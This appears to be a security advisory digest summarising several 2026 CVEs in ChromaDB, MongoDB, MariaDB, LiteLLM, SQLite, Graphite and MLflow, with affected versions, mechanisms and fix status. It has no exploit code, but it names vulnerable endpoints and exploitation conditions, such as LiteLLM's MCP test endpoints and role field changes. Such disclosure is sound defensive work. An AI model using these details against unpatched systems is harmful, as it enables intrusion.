In ChromaDB Python versions 0.5.0 or later a high severity vulnerability CVE-2026-45831 was detected. This vulnerability allows an authenticated user to perform cross-tenant actions and gain unauthorized access to isolated data. This occurs because the SimpleRBACAuthorizationProvider evaluates whether a user holds a given permission, but fails to check which tenant, database, or collection that permission actually applies to. Consequently, attackers can bypass intended access restrictions across different tenant environments. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-45831.
In MongoDB versions from including 7.0.0 and before 7.0.35, including 8.0.0 and before 8.0.24, including 8.2.0 and before 8.2.10, including 8.3.0 and before 8.3.3 a medium severity vulnerability CVE-2026-9750 was detected. This vulnerability allows an authenticated user to cause a server crash (Denial of Service) or return incorrect query results. This occurs due to insufficient separation between user-controlled document fields and internal metadata during query execution. By creating specifically crafted documents, an attacker can interfere with internal metadata processing. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-9750.
Read more Database
In MariaDB Server versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1 a high severity vulnerability CVE-2026-48165 was detected. This vulnerability allows a high-privileged MariaDB user to execute arbitrary shell commands with the privileges of the mariadbd process on the galera joiner node. This occurs due to improper handling of the wsrep_sst_receive_address or wsrep_sst_donor global system variables. To address this issue, users should upgrade MariaDB Server to versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, or 12.3.2. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-48165.
In ChromaDB Python versions from including0.5.0 up to, including, 1.5.9 a high severity vulnerability CVE-2026-45832 was detected. This vulnerability allows an attacker to bypass authorization controls and gain unauthorized access to data. This occurs because all V1 collection-level endpoints improperly pass None for the tenant and database parameters to the authorization layer. By interacting directly with these V1 endpoints, attackers can successfully circumvent intended access restrictions. There’s no fix available for this issue at the moment. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-45832.
In LiteLLM versions 1.74.2 to before 1.83.7 a medium severity vulnerability CVE-2026-42271 was detected. This vulnerability allows any authenticated user, including those with low-privileged internal-user keys, to execute arbitrary commands on the proxy host. This occurs because the MCP server preview endpoints (POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list) improperly accept and execute a full server configuration from the request body. When a stdio configuration containing command, args, and env fields is supplied, the endpoints spawn the specified command as a subprocess with the privileges of the proxy process, completely bypassing role-based access checks. To address this issue, users should upgrade LiteLLM to version 1.83.7. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-42271.
In LiteLLM versions prior to 1.83.10 a high severity vulnerability CVE-2026-47102 was detected. This vulnerability allows an authenticated user, such as one with the org_admin role, to escalate their privileges and gain full administrative access to the platform. This occurs because the /user/update endpoint, while correctly restricting users to updating only their own account, fails to restrict which specific fields can be modified. As a result, an attacker can change their own user_role to proxy_admin, granting them unauthorized control over all users, teams, keys, models, and prompt history. To address this issue, users should upgrade LiteLLM to version 1.83.10. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-47102.
In SQLite versions before 3.53.2 a high severity vulnerability CVE-2026-11824 was detected. This vulnerability allows an attacker to cause a Denial of Service (crash) or potentially execute arbitrary code. This occurs due to a heap-based buffer overflow in the FTS5 full-text search extension (specifically within the fts5ChunkIterate() function). By supplying a specially crafted database with malicious continuation page metadata (where the szLeaf value is smaller than 4), an attacker can trigger an integer underflow. This results in an inflated remaining byte count during FTS5 MATCH query processing, leading to the overflow of attacker-controlled data into the heap. This vulnerability affects applications compiled with the SQLITE_ENABLE_FTS5 flag. To address this issue, users should upgrade SQLite to version 3.53.2. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-11824.
In Graphite versions before 1.3.15 a high severity vulnerability CVE-2026-50593 was detected. This vulnerability allows an attacker to cause an out-of-bounds memory write, potentially leading to arbitrary code execution, memory corruption, or a denial of service. This occurs due to an integer underflow in the slotat function, which fails to properly validate that an offset is within the allowed slot-map range when processing Graphite actions. To address this issue, users should upgrade Graphite to version 1.3.15. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-50593.
In MLflow versions up to 3.10.0 a low severity vulnerability CVE-2026-10803 was detected. This vulnerability may allow a local attacker to compromise dataset integrity or cause hash collisions. This occurs because the Dataset Digest Computation component (specifically the mlflow.data.digest_utils function in mlflow/data/digest_utils.py) utilizes a weak cryptographic hashing algorithm. Although the attack complexity is rated as high and exploitability is difficult, a proof of concept has been published. There is no fix to this yet. For more details, visit https://nvd.nist.gov/vuln/detail/CVE-2026-10803.